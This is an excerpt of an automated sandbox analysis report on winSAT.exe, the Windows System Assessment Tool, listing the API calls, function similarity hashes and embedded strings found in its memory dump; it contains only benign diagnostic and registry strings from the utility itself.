                                                                                                                                                                                              • CheckTokenMembership.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7463
                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7475
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD7485
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780F9EDEA), ref: 00007FF780FD74A4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                              • String ID: base\winsat\common\winsatutilities.cpp
                                                                                                                                                                                              • API String ID: 1125035699-683828118
                                                                                                                                                                                              • Opcode ID: 16f08f34a3520767a4bce9a053d86719e266f8ecd70336167b11855c30fb4abd
                                                                                                                                                                                              • Instruction ID: 6b8c7c7c3d35a26430bc0128f77a6d68bc35977459c9812d1bc6c3ea7bd0158d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 16f08f34a3520767a4bce9a053d86719e266f8ecd70336167b11855c30fb4abd
                                                                                                                                                                                              • Instruction Fuzzy Hash: B9316772A28B51CAE7109F60E8441ADBBB8F74DB54FA18136DE4D43B48DF38D545CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorInformationLastLogicalProcessor$InfoSystemmalloc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4232983313-0
                                                                                                                                                                                              • Opcode ID: de47acfba31066c2271faddbbf81517749ac207c03630c107d70b6b34f402b11
                                                                                                                                                                                              • Instruction ID: 70383a5eace23907f25e3da917148e92730d56dc6d705557576885905ad7e14e
                                                                                                                                                                                              • Opcode Fuzzy Hash: de47acfba31066c2271faddbbf81517749ac207c03630c107d70b6b34f402b11
                                                                                                                                                                                              • Instruction Fuzzy Hash: C0319A76A18786C6D724DF25E84056CFBA0FB89F80FA48135DA4E87B94DF38E844CB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                              • API String ID: 1480402491-3788999226
                                                                                                                                                                                              • Opcode ID: c3b03abaeba473964202ef80826ee842c0101518cb27dd78b59084bfd433504a
                                                                                                                                                                                              • Instruction ID: 850c62a0766ff48de4f253af43912c4936f0aa01730ef715f56c18dfd92ae57c
                                                                                                                                                                                              • Opcode Fuzzy Hash: c3b03abaeba473964202ef80826ee842c0101518cb27dd78b59084bfd433504a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CB1F4A2B0978A82DE24EB16E4001AAE3A2FB54BD4FA49132DE9D077D5DF3CF551C310
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1249254920-0
                                                                                                                                                                                              • Opcode ID: e4b332a47f02e1f7e2d5769a93b7caf1f0983b9bd8db4581ebd599304e0087a0
                                                                                                                                                                                              • Instruction ID: 7a21d2c1f57428257f41f4b880d9ba73770b67ab66b4d6c6ae1525f3584f646e
                                                                                                                                                                                              • Opcode Fuzzy Hash: e4b332a47f02e1f7e2d5769a93b7caf1f0983b9bd8db4581ebd599304e0087a0
                                                                                                                                                                                              • Instruction Fuzzy Hash: FBD0C769E1970A86F75C37A16C551755250BF5CB61F745034C90F45364DD7C948ACB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(?,?,?,?,00007FF780FD56A9,?,?,?,?,?,?,00007FF780F999D0), ref: 00007FF780FD4D14
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE2F8: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE362
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE2F8: CloseHandle.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE37B
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00007FF780FD4D2A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCriticalEnterExitHandleProcessSectionSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 915451738-0
                                                                                                                                                                                              • Opcode ID: b06ac2e7ad7a353e789c00a753087b3fa283f5700c4f20c242a7d645a3ea8a48
                                                                                                                                                                                              • Instruction ID: 1eabb0eb2e3bbc2101c6539b7b05056bb0a9dc5ec5e14e677b22bb3096c025f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: b06ac2e7ad7a353e789c00a753087b3fa283f5700c4f20c242a7d645a3ea8a48
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D0C924908591C7F3447B50EC053BDAA50FB46712FF04174C10E05292CFAD2484CB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3859560861-0
                                                                                                                                                                                              • Opcode ID: 8751c996d58478eeb4ffddafcc8ef92cb41152bbaf4b3f5c930e3de30d5ebeca
                                                                                                                                                                                              • Instruction ID: 7738cd25e380d305e20c2cf4b62b0e1a7b03a846002f54ec831d01d5c093dd06
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8751c996d58478eeb4ffddafcc8ef92cb41152bbaf4b3f5c930e3de30d5ebeca
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7E09A26A04A8186E7049B56F504379FA60FB8EFD0F68D120CE0A06708CE38C484CB00
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ControlDeviceFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3512290074-0
                                                                                                                                                                                              • Opcode ID: ec03c51d71c64ebe428cc224d4e0dc846d9f001cf038a09347dc456f5621201c
                                                                                                                                                                                              • Instruction ID: fffa8c2463f0c065360fcfe42c808fe14a128696a6cb5c65556afc95650d9d03
                                                                                                                                                                                              • Opcode Fuzzy Hash: ec03c51d71c64ebe428cc224d4e0dc846d9f001cf038a09347dc456f5621201c
                                                                                                                                                                                              • Instruction Fuzzy Hash: A1014837B28B4086E710DB29F44531DBBE1BB89750FA15138EAAD83760DF3AC455CB10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d0d42c82d2ef74cfdc025912d9d5c21e86d1b494dd9525300916cab29790b24a
                                                                                                                                                                                              • Instruction ID: 3c0f602b7809bd175f35322584f5ce46aa1a84017e3bc04df4ac48a556ff3692
                                                                                                                                                                                              • Opcode Fuzzy Hash: d0d42c82d2ef74cfdc025912d9d5c21e86d1b494dd9525300916cab29790b24a
                                                                                                                                                                                              • Instruction Fuzzy Hash: DEC002F3A093808F8789CF6EA8504587BE5B788711B54C13EA619D3310E3318140CF12
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$CloseLibrary$EnabledEventFreeHandleLoadOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFormatHandlerLastLockMessageModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Cannot ensure winsat directory exists: %s$PrivateError2
                                                                                                                                                                                              • API String ID: 3527692918-605043853
                                                                                                                                                                                              • Opcode ID: 147a0eac15cc5e19155f422876c49af70a37c59056e338aec2df5a2bfa3592e8
                                                                                                                                                                                              • Instruction ID: 335a6ff2398881933979bfff5cea43723f95b14ae9db94b22da52f3ecf5d5eb4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 147a0eac15cc5e19155f422876c49af70a37c59056e338aec2df5a2bfa3592e8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 851242A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 2704613218-3112339584
                                                                                                                                                                                              • Opcode ID: 4c83e0f4d37b8bc4f47f6d1a201d832acce18081443d4dde09c58400e7096c1c
                                                                                                                                                                                              • Instruction ID: 68dbcf9c243ff999810a8685e4b26bc8265320f8faa219d587193d385310cc23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c83e0f4d37b8bc4f47f6d1a201d832acce18081443d4dde09c58400e7096c1c
                                                                                                                                                                                              • Instruction Fuzzy Hash: C40241A2D0D68795EB20FB15F8502F9B761FF91344FF09035C68E466A9EEACE544CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: failed COM initialization.$PrivateError2
                                                                                                                                                                                              • API String ID: 3454319971-4149571460
                                                                                                                                                                                              • Opcode ID: 66ba158f75fdcabadefced5ca330610669cdb5061b7cefa180dc003ad55f290a
                                                                                                                                                                                              • Instruction ID: d6800aeee99ef5e1aa196bda9764b3c62cd9b76ff1ceafaa11e568d1bff3a92f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 66ba158f75fdcabadefced5ca330610669cdb5061b7cefa180dc003ad55f290a
                                                                                                                                                                                              • Instruction Fuzzy Hash: B30242A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Close$CriticalEnabledEventOpenSectionValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryEnterErrorFreeHandleHandlerLastLeaveLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_svswprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: cannot init winsat registry entries: %S$PrivateError2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run formal assessment on OS's earlier than Vista$PrivateError2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: User required this run be on bateries, but the machine is not currently on batteries.$PrivateError2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentErrorLastThread$ExceptionThrow$PerformancePriorityProcessQuery$CounterResource$Class$AffinityInfoLibraryLoadMaskSystem__uncaught_exception$FindFreeFrequencyHandleLockModuleNativeSizeofSleepVersionWow64
                                                                                                                                                                                              • String ID: $ num LPI's = $ Bytes, $ struct size = $>> Logical Processor Info: allocating $Cannot get processor, cpu and p-thread count information$ERROR: Can't get logical processor information$ERROR: No Cache information found on this machine$Gather CPU information$Information: GetLogicalProcessorInformation() not supported on this OS$Kernel32.dll$base\winsat\exe\keyinfo.cpp
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnabledEvent$CountCurrentFormatFreeLocalMessageProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: <Message>$ <Hresult>$ </Error>$ <Error>$ </ErrorsAndWarnings>$ <ErrorsAndWarnings>$</AssessmentResult>$</Hresult>$</Message>$<?xml version="1.0" encoding="UTF-8" standalone="yes"?>$<AssessmentResult>$AxeErrorXML: Error creating results.xml file.$Can't write error message '%s' to the registry$Can't write last exit code %u to the registry$Cannot open registry value %s$Cannot open winsat registry key$Cannot read registry value %s$Cannot write registry value %s$ERROR: failed to save can't and why error mesages to the registry$LastExitCode$LastExitCodeCantMsg$LastExitCodeWhyMsg$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$Skipping writing the exit code, cant msg and why msg to registry$Unspecified error %u occured.$Writing exit code, cant msg and why msg to registry $base\winsat\exe\processwinsaterror.cpp$results.xml$w, ccs=UTF-8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wfopen_sfclosefwprintf
                                                                                                                                                                                              • String ID: $ $%s<%s>%s$%s</%s>%s$<?xml version="1.0" encoding="UTF-8" standalone="yes"?>$AssessmentResult$Iteration$Iterations$MetricValues$WriteXML: Error creating results.xml file.$base\winsat\exe\processresults.cpp$results.xml$w, ccs=UTF-8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLastResource$CloseFindLoadLockSizeofmemcpy
                                                                                                                                                                                              • String ID: cannot find the resource$cannot get the resource size$cannot load the resource$cannot lock the resource$resource size is an odd number of bytes$resource size is too small$target string too small to load resource
                                                                                                                                                                                              • API String ID: 3769284822-3195936322
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Current$Process$Priority$Class$ErrorLastThread$DuplicateExceptionHandleThrow
                                                                                                                                                                                              • String ID: Adjusted the priority to %d$Internal error - Failed to copy completion handle.$Internal error - NumThreads zero in MPOperation initialization$Operation started successfully.$base\winsat\exe\WinSATOp.h
                                                                                                                                                                                              • API String ID: 3426075690-1914989635
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CloseCurrentHandle$CancelTerminateTimerWaitable$CriticalEventSection$EnabledEnterErrorLastLeaveObjectSingleThreadWait_vsnwprintf_s
                                                                                                                                                                                              • String ID: Cannot not wait for the watch dog thread to terminate$The wait for the watch dog thread termination timed out$The wait for the watch dog thread termination was abandoned$Watch dog system shutdown$base\winsat\exe\watchdog.cpp
                                                                                                                                                                                              • API String ID: 2085129634-3792182877
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                              • String ID: ']/../../Disk$']/../ETWData/Throughput$/WinSAT/DiskAssessment/PerDiskData/Zone/ModeFlags[@friendlyName='$> Wrote random read disk score, from the profiler, to the registry %u$> Wrote wsswap interference, from the profiler, to the registry %u$> Wrote wsswap throughput, from the profiler, to the registry %u$Can't find disk random read scores in XML output$Disk%sRandomReadThroughput$ERROR: Can't write random read disk score, from the profiler, to the registry %u: %s$ERROR: Can't write wsswap interference, from the profiler, to the registry %u: %s$ERROR: Can't write wsswap throughput, from the profiler, to the registry %u: %s$INFO: Can't find disk random read scores in XML output$Skipping Registry Entry for random read disk score$WsSwapInterference$WsSwapResult$base\winsat\exe\processresults.cpp
                                                                                                                                                                                              • API String ID: 1452528299-1586673344
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: Appliance PC$Desktop$Enterprise Server$IsMobile$Mobile$Performance Server$Platform$PlatformRole$PowerDeterminePlatformRole$SOHO Server$Unknown$Workstation$desc$powrprof.dll
                                                                                                                                                                                              • API String ID: 1866314245-818624304
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Handle$ConsoleCreateErrorFileInformationLastOutput
                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                              • API String ID: 3315080193-3130406586
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB1FC
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB24B
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB2CC
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB31B
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB3A5
                                                                                                                                                                                              • CompareStringW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB40C
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB451
